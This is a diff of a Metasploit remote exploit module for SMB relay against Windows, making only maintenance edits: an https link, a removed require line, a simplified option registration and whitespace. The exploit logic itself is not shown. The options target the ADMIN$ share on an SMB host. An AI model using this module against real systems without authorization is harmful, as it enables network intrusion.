@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 =begin
 Windows XP systems that are not part of a domain default to treating all
 network logons as if they were Guest. This prevents SMB relay attacks from
@@ -16,8 +15,6 @@ under:
      Network Access: Sharing and security model for local accounts
 =end
 
-require 'msf/core'
-
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -95,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]),
         OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ])
-      ], self.class )
+      ])
   end
 
 
@@ -756,5 +753,4 @@ class MetasploitModule < Msf::Exploit::Remote
       raise failure
     end
   end
-
 end
